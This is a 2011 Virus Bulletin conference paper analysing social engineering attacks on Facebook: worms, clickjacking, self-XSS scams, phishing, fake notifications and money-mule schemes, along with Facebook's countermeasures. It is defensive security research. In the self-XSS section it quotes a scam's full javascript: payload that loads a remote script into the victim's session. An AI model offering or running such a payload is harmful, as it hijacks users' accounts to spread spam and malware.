This document summarizes a study on malicious attacks on Facebook that use social engineering. It describes how Facebook's popularity has made it an attractive target for attackers. Several types of social engineering attacks on Facebook are discussed, including worms like Koobface that spread via messages, clickjacking attacks, spam and scam messages, and money mule scams. The document examines specific examples of these attacks and the social engineering techniques used, such as enticing message text or instructions that trick users into installing malware. It notes that attackers have had success bypassing security by using sophisticated social engineering methods on Facebook.

1. A STUDY OF MALICIOUS
ATTACKS ON FACEBOOK
Maria Patricia M. Revilla
Commtouch, Philippines
October 2011
Copyright is held by Virus Bulletin Ltd, but made available on this site for
personal use free of charge by permission of Virus Bulletin
(http://www.virusbtn.com).

2. A STUDY OF MALICIOUS ATTACKS ON FACEBOOK REVILLA
A STUDY OF MALICIOUS The popularity, number of subscribers, and level of activity
have made Facebook an attractive tool for attackers who use
ATTACKS ON FACEBOOK social engineering in order to spread malicious content or earn
Maria Patricia M. Revilla money unethically. Over the years, social engineering has been
Commtouch, Philippines enormously effective as it succeeds in convincing users to
unknowingly act in the interests of cybercriminals. Spam and
email scams have been used to deceive users, for example,
Email Patriciar@commtouch.com offering seemingly legitimate employment, while putting
victims to work as money mules who unwittingly help launder
stolen funds. It has also been used as a tool to start and force
ABSTRACT the spread of worms by including attachments disguised as
normal documents.
Social networking sites have, beyond doubt, made it into
today’s popular culture. They have apparently become the The use of fake file icons such as those used for Windows
primary resource for the masses when it comes to socializing folders, Word documents, text files, media files and others are a
for the sole reason that they generally measure up to what the subtle form of social engineering, letting users think that a
modern populace claim to demand – something fast, easy and malicious application is just a normal document. Instant
accessible. Facebook is a perfect example. messages on Yahoo! or MSN use convincing phrases promising
must-see pictures or videos to trick users into clicking malicious
Facebook has become undeniably popular. With 600 million
links that may point to phishing sites or rogue software. Rogue
users to date, it could be considered to be the most widely
software or fake anti-virus products are themselves a form of
used social networking site in the last decade. People patronize
social engineering. By scaring users with ‘detected’ malware,
Facebook for its simple, but rather functional features, which
they convince them to pay for products that they believe will
range from public messaging through wall posts and private
actually help them remove the ‘infection’. Sophisticated social
messaging, to sharing photos, videos and URL links, to
engineering attacks use emotion and human desires to trick
gaming, and even marketing and advertisements. It even
users. Protecting users from themselves is a tough job and it is
makes a good online outlet for thoughts in the form of ‘status
something that a computer cannot really do.
updates’ which can be changed as often as one wishes.
In 2008, the Koobface worm spread through social networks,
With its popularity and effectiveness, Facebook has also including Facebook (where its name came from). It may be
become a hot spot for attackers. Over the years, social considered to be one of the most successful worms as new
engineering has been reported to effectively spread malicious variants are still being encountered – over 20,000 variants [4]
programs which are hard to prevent, especially granted that by April 2011. Aside from the Koobface worm, there have
they are designed to trick human thinking. been other forms of attacks – clickjacking, phishing, spams,
This paper will seek to study the social engineering attacks scam messages, links to rogue applications, and others that
that have been identified to spread malware through Facebook. help cybercriminals earn money. It is certainly alarming to see
By tracking down the distribution methods/mechanisms for how these forms of attack have increased.
spreading malware, and the current preventive and defensive Based on the number of active users and activities performed
measures, this paper aims to give an insight into the challenges by Facebook users, it is clear that Facebook has become an
that are being faced in terms of protecting users. effective social networking site with people benefiting from its
integrated functionality such as photos and messaging. At the
INTRODUCTION same time, attackers have successfully taken advantage of this
functionality to turn Facebook into a channel for spreading
Facebook has become enormously popular, reaching over 600 malicious content. Even a small percentage of compromised
million users to date [1]. Users have increasingly integrated users would equal a large attack base given the number of
social networks into their lives, spending a reported 700 active users on the site.
billion minutes per month on Facebook [2]. Every 20 minutes
approximately 24,857,000 actions are performed which may Security companies have developed tools and have improved
be broken down into: scanners to detect and prevent intrusion of malicious
programs. Solutions range from single file detection to generic
and heuristic detections, and even cloud-based technologies.
10,208,000 comments made
As these protection technologies have improved, attacks have
2,716,000 photos uploaded grown more sophisticated in an attempt to evade new and
existing security measures. Attackers usually take advantage
2,716,000 messages sent
of commonly used software and/or popular sites combining
1,972,000 friend requests accepted social engineering with exploits of vulnerabilities in programs
like Adobe Reader or Internet Explorer. Our observation is
1,851,000 status updates
that attackers have achieved the most success in bypassing
1,587,000 wall posts security measures by employing sophisticated social
engineering methods.
1,484,000 event invites
This paper will focus on analysing social engineering attacks
1,323,000 tagged photos on Facebook and will try to present the preventive measures
1,000,000 links shared the industry has provided to users, defensive measures/tools
that are available for users, and the challenges faced in
Table 1: Facebook activity statistics onlineschools.org [3]. preventing users from becoming victims.
VIRUS BULLETIN CONFERENCE OCTOBER 2011 1

3. A STUDY OF MALICIOUS ATTACKS ON FACEBOOK REVILLA
THE PROBLEM – FACEBOOK SOCIAL itself as a photo album application. Following the link to
ENGINEERING ATTACKS the fake application, the user was prompted to download
the file ‘FacebookPhotos#####.exe’, which is the
A trusting user in a social network environment wouldn’t malicious executable. Newer variants used different
suspect that a friend (deliberately added to a friend list) would filenames such as ‘Facebook-pic[number].exe’ (e.g.
send any harmful content. This trust turns a very popular and Facebook-pic000751357.exe) [8].
widely used social networking site like Facebook into a huge
opportunity for attackers. Users are drawn to action by
Clickjacking
‘friends’ – following a message, links, or an invite – without
suspecting that this will undermine security. Another type of social engineering attack is clickjacking. This
method tricks a user into allowing a malicious script or a code
Worms: Koobface and Palevo to execute without his knowledge by enticing the user to click
on seemingly normal objects on a web page, such as buttons,
The Koobface worm has been around since 2008 [5]. It was links, or images. On the Facebook platform, attackers were
first encountered through Facebook messages that enticed a able to find ways to exploit some of its functionalities such as
user to view a video from a link that looked as though it came the ‘Like’, ‘Publish’, and ‘Comments’ buttons when writing
from YouTube. Alluring messages like, ‘You must see it!!!...’, comments on photos, videos or links.
were the first step of its social engineering tactic. Users who
clicked on the link were prompted to download newer A worm that spread on Facebook through a clickjack attack
versions of Adobe Flash Player – the second part of the social was successfully executed using an invisible IFrame. It
engineering attack. The downloaded file ‘codecsetup.exe’ was basically exploited the ‘Publish’ button that posts a link to the
actually not an Adobe Flash Player, but a malicious user’s wall. The link points to a page that contains an invisible
executable. Once the executable is installed, the infected IFrame shown in the code in Figure 3 (from jsunpack.jeek.org).
machine turned into a bot used for spreading more messages The user is unaware that a click anywhere on the page is
with malicious links and for other malicious purposes. actually a click on the ‘Publish’ button. This results in a post
Later, when users became aware of a worm that spread using on the victim’s wall, which will then be seen by the victim’s
a fake YouTube-like video, a new variant was encountered friends, probably causing them to click as well, and in this
which used a Blogspot link sent through messages of friends way continuing the spread of the malware. This worm was
[6]. The message had the same video-related theme, but the first reported by F-Secure in May 2010 [9].
changed destination to a Blogspot link reduced the suspicion. Following this attack, a lot of other clickjack attacks followed
The Blogspot pages included JavaScript redirects to pages by exploiting the famous ‘Like’ button, also known as a
again requiring the installation of a so-called video playing ‘likejacking’ attack. When a user ‘likes’ a certain page, video,
component (as with the initial version). As before, the ‘video photo or a website on Facebook, it enables the user to share
playing component’ was in fact a malicious executable. In this this content with friends. It’s almost the same as suggesting it
case, the infected machine opened new Blogspot accounts and to friends as the liked page appears on the user’s newsfeed
distributed the malicious links to friends. Figures 1 and 2 causing friends to see it and probably to click it themselves.
show some examples. This attack works especially well when the link has a
descriptive text specially crafted to attract users, such as
messages promising a ‘video of Justin Bieber’, or ‘pics of
Miley Cyrus’, or any current newsworthy event [10]. An
example of the actual code used for this attack is shown in
Figure 4 (from pastebin.com).
The code basically uses the same method as an invisible
IFrame which follows the user’s mouse. Any click on the
page will be a click on the ‘Like’ button, without the user’s
knowledge.
Figure 1: Blogspot post example (1).
Another attack exploited the ‘Comment’ functionality. Once a
user ‘comments’ on a photo, a video or a link on Facebook, it
will appear on the user’s wall or newsfeed, causing friends to
see it and, as before, probably attracting them to see and click
on it as well. Here again, the messages included text with
famous names such as Justin Bieber. Clicking on the link led
to a page with a question and text entry box for the answer.
The text box was actually a Facebook comment box which
would result in the posting of a comment on the victim’s wall,
or a message on the victim’s newsfeed, causing it to be shared
Figure 2: Blogspot post example (2). and seen by the user’s friends. This attack was reported by
Sophos in April 2011 [11].
Palevo is another worm that has been known to spread
through social network chat messages or instant messages
including Facebook [7]. This worm has exploited Facebook Scam and spam messages on Facebook
chat and Facebook application functionality. It tried to Facebook has also become the target of scammers and
spread by sending chat messages to friends and disguised spammers. Unethical and illegal advertisers have predictably
2 VIRUS BULLETIN CONFERENCE OCTOBER 2011

4. A STUDY OF MALICIOUS ATTACKS ON FACEBOOK REVILLA
Figure 3: Clickjack sample using IFrame tag (1).
Figure 4: Clickjack sample using IFrame tag (2).
taken advantage of the large number of Facebook users. One
method of scam and spam has spread on Facebook through a
manual cross-site scripting (XSS) attack (also called a
self-XSS attack). The concept of an XSS attack is not new,
but the interesting thing here is the social engineering used
that convinces the user to manually enter the malicious script
in the browser address bar. The topics were varied [12, 13]:
• Promises of 500 free Facebook credits (something that
does not exist) Figure 5: Self-XSS instruction to users (1).
• An application to see who had been viewing a user
profile
• Video of Osama Bin Laden’s assassination.
These all led to pages with instructions such as these:
Just follow these 3 steps: Figure 6: Self-XSS instruction to users (2).
1. Copy this code (highlight and press CTRL-C):
javascript:(a=(b=document).createElement(‘script’)). a user ends up viewing ads that are not really related to the
src=’//[omitted]/f.js’,b.body.appendChild(a);void(0) subject of the link that they originally clicked. Most of these
2. Delete the actual address from the url field in focus on methods to earn easy money, earn points/credits,
your browser and paste the code instead. view gossip or the latest news and events, and others.
3. Press Enter and wait for a bit, it can take up to Having hijacked the user’s Facebook session, the script also
a minute to complete. sends the scam messages through almost all means of
That’s it! reaching out to a victim’s friends including: chat, wall posts,
If you are having trouble with these instructions, status updates, event invitations and private messages. It also
try viewing the instructions here: http://[omitted]. makes use of shortened URLs in order to avoid immediate
info/?sg2lq
suspicion from users.
it’s where I learned it
Figure 7 shows an example of a fake event invitation. Notice
Attackers even provided step by step image guides showing that the subject is ‘Official App: See Who has Viewed your
how to perform the self-XSS attack, as shown in Figures 5 Profile? Find out here! [bad shortened link]’. Many users will
and 6. notice that this doesn’t really sound like an ‘event’, but the
idea is to catch the user’s attention and draw them into
It is quite remarkable that there are users who fall for scams
following the link.
which require them to manually copy and paste code into
their browser’s address bar. Once the code has been pasted as An example of spam code shown in Figure 8 illustrates how
per the instructions, the user is redirected to a ‘survey page’. the messages continue to spread widely. The code uses an
This is an affiliate link where rogue affiliates earn money for obfuscation technique to hide the routine using encoded
bringing users to partner sites. At the end of the survey page, function calls stored in an array of variables – in this sample,
VIRUS BULLETIN CONFERENCE OCTOBER 2011 3

5. A STUDY OF MALICIOUS ATTACKS ON FACEBOOK REVILLA
var _0xb65. Looking at the rest of the code gives us a clue as
to its real purpose since it uses the XMLHttpRequest API,
which is used for sending HTTP or HTTPS requests directly
to a web server.
Decoding the variable _0xb65 reveals what the routine is all
about (Figure 9).
Basically, once the script is executed, messages will be sent to
the victim’s friend with texts based on the variables settings
in the code as shown in the additional code below. Aside from
posting a message the script will also make a comment on the
posted message and will also ‘like’ the post it created
(Figure 10).
Figure 11 shows how the resulting post, comment and
Figure 7: Fake Facebook event invitation. message will look.
Figure 8: JavaScript spam code (1).
Figure 9: JavaScript spam code (2).
Figure 10: JavaScript spam code (3).
4 VIRUS BULLETIN CONFERENCE OCTOBER 2011

6. A STUDY OF MALICIOUS ATTACKS ON FACEBOOK REVILLA
Following the links leads to the sites shown in Figures 16 and
17, enticing users by promising results as well as a discount
when they buy the product.
Figure 11: Resulting post made by the spam code.
Money-mule and credit card scams
Money-mule scams have also made their way into Facebook.
As with other platforms, scammers attract people with
promises of easy money. Money-mule recruitment usually
starts with Facebook groups (which can be started by any Figure 16: Scam post advertisement sample (1).
Facebook user). These groups often attract large followings
because people do not know what they are getting into [14].
Other frauds have also appeared, such as credit card scams.
These start with messages designed to attract users by
proposing ‘money-making jobs’, or books about ‘how to earn
big money’, ‘how to win the Lotto’, or ‘guides on how to be
attractive’. The example in Figures 12 and 13 shows the first
part of such an attack using an ‘easy money making’
Facebook group. Some of the posts on the group’s wall are
products being sold, relating to books for winning the Lotto
or attracting women (Figures 14 and 15).
Figure 17: Scam post advertisement sample (2).
Once a user accepts the offer, the payment is made via a
credit card transaction as shown in Figures 18 and 19.
Figure 12: Scam group page sample (1).
Figure 13: Scam group page sample (2).
Figure 18: Payment scam sample (1).
Figure 14: Scam post sample (1).
Figure 15: Scam post sample (2). Figure 19: Payment scam sample (2).
VIRUS BULLETIN CONFERENCE OCTOBER 2011 5

7. A STUDY OF MALICIOUS ATTACKS ON FACEBOOK REVILLA
The site ‘complaintsboard.com’ shows that the site seems to
be a fraud or a scam (Figure 20).
Figure 23: Facebook lottery email scam.
Figure 20: Complaintsboard complaint comments.
Fake email notifications – more scam, spam
and malware attachments
Spammers promoting pharmaceutical products have also used
Facebook as an opportunity. Fake Facebook email Figure 24: Fake Facebook email password notification (1).
notifications trick users into clicking links leading to online
pharmacy sites [15]. An example of a fake email notification
is shown in Figure 21.
Figure 21: Fake Facebook email notification leading to online
pharmacy site. Figure 25: Fake Facebook email password notification (2).
Following the link leads to the pharmaceutical store page
shown in Figure 22.
Figure 22: Pharmaceutical store page.
Lottery scams have also been very common, using fake email
notifications describing surprise lottery wins such as the
‘Facebook Africa Jackpot Promo’ shown in Figure 23 [16]. Figure 26: Fake Facebook email password notification (3).
6 VIRUS BULLETIN CONFERENCE OCTOBER 2011

8. A STUDY OF MALICIOUS ATTACKS ON FACEBOOK REVILLA
The email has all the signs of an advance fee fraud scam,
promising a huge sum of money, requesting detailed personal
information, and requiring secrecy.
Malware writers have also taken advantage of fake Facebook
email notifications. Emails include subjects relating to:
‘Facebook Abuse Department’, ‘Facebook Security’, and
others (Figure 24).
In the examples shown in Figures 25 and 26, variants of the
malware detected as Oficla (aka Bredolab) are sent as
attachments with the email describing a password reset due to
spam. Subjects include, ‘Spam from your account’.
The attachment names include: ‘Attached_SecurityCode.exe’, Figure 30: Facebook phishing sites statistics.
‘Facebook_DOCUMENT.EXE’ and ‘Facebook_
PASSWORD.EXE’. These are all malware executables that
use misleading file icons in addition to their misleading file
Fake applications
names. The use of trusted icons is a common social Many Facebook users enjoy Facebook applications and games
engineering tactic to trick a user into executing the malware that exist within the social network such as FarmVille and
file. Below are examples of the Oficla executables with CityVille, and attackers have also taken advantage of this
misleading filenames and icons: functionality. The problem with applications on Facebook is
that they have the ability to access some or all of the user’s
profile information. Rogue applications can therefore post
messages on a friend’s wall, send messages, and even extract
Figure 27: Oficla attachment file (1). information from user profiles to be used for any malicious
purpose. Attackers usually use catchy subjects such as: ‘who
viewed your profile’. A further issue is that the verification
process for application writers is relatively simple.
Figure 28: Oficla attachment file (2).
PREVENTIVE MEASURES
Phishing Prevention is always better than cure. The trusted network
Genuine Facebook user accounts are very valuable for nature of Facebook has made some cybercrime much easier.
cybercriminals since they provide them with access to a On the other hand, Facebook has improved its security
trusting network of friends. Facebook users have therefore measures and settings to protect its users. These measures
become a natural target for phishers. Many fake pages have have included partnerships with security organizations to help
been launched (fed from fake email notifications) in order to improve the site’s security tools. Although these systems are
steal users’ login information. Cybercriminals can then use not perfect, they are worth noting as they do contribute to user
these stolen accounts for many of the malicious purposes security.
described in this paper. Attackers have become skilled at
mimicking the actual Facebook login page, as in the example Spam, scam and clickjack prevention systems
shown in Figure 29 [17].
Facebook has implemented security checks in order to protect
users from phishing attacks. In the example below it was able
to detect an attempt to log in from a page outside Facebook.
When a user tries to visit a page that does not belong to
Facebook, but requires a login to Facebook, the warning
message below appears:
Figure 29: Facebook phishing page sample.
According to PhishTank.com statistics [18], Facebook has
consistently been in the 10 top sites targeted by phishing.
From September 2009 until March 2011, 11,211 counts of Figure 31: Security notice from a login attempt outside
phishing attempts were recorded (Figure 30). Facebook.
VIRUS BULLETIN CONFERENCE OCTOBER 2011 7

9. A STUDY OF MALICIOUS ATTACKS ON FACEBOOK REVILLA
In the example in Figure 32, the mechanisms were also able Facebook has automated the detection of suspicious ‘like’
to detect a suspicious phishing site that used a shortened behaviour, which can prevent a clickjacking attack. This is
URL. An example of a warning message is shown. good on some level, however, in cases where the behavioural
pattern of a clickjacking attack changes, then chances are that
new attacks might slip through [19].
Facebook has also automated detection and blocking of
suspicious content including giving warnings why certain
content has been blocked. Using information from user
reports and common patterns of spam and scam behaviour
they have been able to prevent users from opening and
accessing malicious content [20]. However, spam writers
continually try to evade spam detection systems. For instance,
one script included the following code:
Figure 32: Facebook suspicious link warning.
In some cases, Facebook security tools are able to check and
prevent spammers and scammers from creating fake user
accounts. Examples of some of these security checks are
shown below:
Figure 36: JavaScript spam code.
A common indicator of a spammer account is of course the
large number of messages sent. In the code above, the
variable nfriends is actually the number of friends the spam
and scam messages will be sent to. Although it seems strange
that messages are sent to only 15 of the victim’s friends (as
opposed to all the victim’s friends), this is one way of trying
to avoid detection based on the volume of sent messages. In
addition, in order to avoid detection based on message
content, the encoding of some characters of the words inside
the message body has been altered.
Figure 33: Account security check (1).
Facebook apps
As described above, malicious apps have access to the user’s
profile information and can take control of some actions such
as posting on walls. As of this writing, an app creator must
first verify an account by supplying a phone number or credit
card number. The image below shows the verification pop-up
Figure 34: Account security check (2). window:
Figure 37: Facebook verification on application creation.
This is helpful to a degree. After supplying the information,
an application can be created for the Facebook platform. The
problem here is that, after the account has been verified, the
developer can instantly publish any application without going
through some approval from the Facebook team. Therefore,
any malware writer can write an application on the platform
Figure 35: Account security check (3). and publish it without going through any security check.
CAPTCHA verifications are designed to prevent automation of
account creation by non-humans. When this CAPTCHA Facebook security settings
verification pops up, a user can optionally verify an account in Facebook has enabled secure browsing by implementing
order to avoid CAPTCHA verifications in the future. This HTTPS on its platform. This adds protection and prevents
verification requires a phone number. These checks are helpful, hackers from being able to steal identity information while it
but they open the issue of user privacy and sharing of sensitive is in transit – especially when a user logs in from a public
information. Security check messages may also pop up in place such as a coffee shop or library. However, this security
some cases of clicking the ‘Like’ button of certain group pages. option is not enabled by default.
8 VIRUS BULLETIN CONFERENCE OCTOBER 2011

10. A STUDY OF MALICIOUS ATTACKS ON FACEBOOK REVILLA
other anti-virus companies can enlighten customers about
new threats that are found on the social network. Many of
these blogs are very illustrative and informative, allowing
users to easily understand, and be aware of the types of
threats they might encounter on Facebook. These also provide
Figure 38: Facebook HTTPS browsing setting. tips on strengthening security and account settings.
Another security tool is the Facebook activity monitor that
enables remote logout. A user can see the latest activities in DEFENSIVE MEASURES
his account by checking the Account Settings which include Facebook generally blocks known malicious content or pages
an indication that the account is active through a different that are reported to it. Facebook reporting tools include links
location or device. The screen below shows a single account such as ‘Mark as Spam’ and ‘Report/Block this Person’.
signed in on different computers. The user may end any active
login from a different computer or location that he is not Another defence available to end-users is a locally installed
aware of. This is helpful in tracking if someone else is using security product, such as URL and spam filtering software,
an account. and an anti-virus product. Anti-virus firms have also
responded to the new threats by ensuring detection of new
variants of Facebook worms, Oficla, and the increasing
number of malicious scripts used for spamming. At the same
time, security groups have created their own Facebook pages
for users to view the latest threats including advice about how
to remain secure and protected. Several companies have also
released software specifically for Facebook.
CONCLUSION
As it has gained in popularity Facebook has also been
increasingly used for malicious purposes, and its name,
functionalities and features have been vastly exploited. The
security industry is continually working to keep pace with
new cybercriminal tricks on Facebook. In addition, Facebook
has taken several steps to protect its users while working with
security groups in order improve its defence systems and the
security tools on the platform.
As shown by the many examples above, attackers employ
numerous social engineering tactics to help spread malware,
Figure 39: Facebook activity monitor. scams and spam. Indeed, the key security problem with
Facebook lies in the trusted nature of friend connections
Facebook security and safety page which are so easy to exploit with social engineering.
Educating users about Internet safety is another important Education of users is therefore a key part of enhancing
preventive measure – particularly since most of the attacks Facebook security.
rely on social engineering. The Facebook security page
provides: ACKNOWLEDGEMENTS
• Information such as how to protect a user account, and I would like to express my sincere gratitude to Commtouch
how to take action when an account has been VirusLab and to the hands of the people that God used to
compromised and used for sending scams or spam. make the completion of this paper possible: Robert
• Information about the threats that a user may encounter Sandilands, Rommel Ramos, Avi Turiel, Rebecca Herson,
on Facebook and helpful tips to avoid scams, spams, Catherine Lor and Jinky Suarez. And whatsoever ye do, do it
hacks and malware that may be spreading on the heartily, as to the Lord, and not unto men; – Colossians 3:23.
platform.
• A way of reporting a possible security vulnerability REFERENCES
allowing Facebook to work on improving security [1] http://www.socialbakers.com/Facebook-statistics/
measures. ?interval=last-week#chart-intervals.
• A safety page that explains Facebook as a community in [2] http://www.Facebook.com/press/info.php?statistics.
which everyone has a shared responsibility of keeping it
[3] http://www.onlineschools.org/blog/Facebook-
as a safe environment. This gives an insight for parents,
obsession/.
teens and teachers who are using Facebook and helps
them understand the environment as well. [4] http://blog.Facebook.com/blog.php?post=
68886667130.
Security blogs [5] http://www.kaspersky.com/news?id=207575670.
There continue to be numerous blog posts written about [6] Commtouch Trend Report 2010 Q4.
Facebook threats. Commtouch’s security blog and those of http://www.commtouch.com/download/1934.
VIRUS BULLETIN CONFERENCE OCTOBER 2011 9

11. A STUDY OF MALICIOUS ATTACKS ON FACEBOOK REVILLA
[7] http://blog.commtouch.com/cafe/malware/malware-
spread-via-Facebook-chat/.
[8] http://nakedsecurity.sophos.com/2011/01/09/
Facebook-photo-album-chat-messages-spreading-
koobface-worm/.
[9] http://www.f-secure.com/weblog/archives/
00001955.html.
[10] http://athansj.blogspot.com/2011/03/Facebook-
likejacking-attack.html.
[11] http://nakedsecurity.sophos.com/2011/04/30/
Facebook-comment-jacking-omg-i-cant-believe-
justin-bieber-did-this-to-a-girl/.
[12] http://blog.commtouch.com/cafe/malware/500-free-
credits-from-Facebook-%E2%80%93-malware/
#disqus_thread.
[13] http://blog.commtouch.com/cafe/malware/
%E2%80%9Cosama-bin-laden-dead-%E2%80%93-
actual-video%E2%80%9D-new-Facebook-malware/.
[14] http://www.thenewnewinternet.com/2010/06/01/
Facebook-used-to-find-money-mules/.
[15] http://blog.commtouch.com/cafe/spam-favorites/
spammers-vote-Facebook-%E2%80%93-
%E2%80%9Capplication-of-the-year%E2%80%9D/.
[16] http://blog.commtouch.com/cafe/anti-scam/harry-
potters-magic-money-foundation-and-more/.
[17] http://blog.commtouch.com/cafe/phishing/avoiding-
Facebook-phishing/.
[18] http://www.phishtank.com/stats.php.
[19] http://nakedsecurity.sophos.com/2011/03/30/
Facebook-adds-speed-bump-to-slow-down-
likejackers/.
[20] http://blog.Facebook.com/blog.
php?post=403200567130 (spam prevention systems).
[21] http://www.securelist.com/en/blog/208187962/
Facebook_money_mule_or_credit_card.
[22] http://en.wikipedia.org/wiki/Clickjacking.
[23] http://www.personalizemedia.com/the-count/.
[24] http://www.Facebook.com/security.
[25] http://www.Facebook.com/blog.php?post=
486790652130.
[26] http://blog.Facebook.com/blog.php?post=
436800707130.
[27] http://blog.Facebook.com/blog.php?post=
389991097130.
10 VIRUS BULLETIN CONFERENCE OCTOBER 2011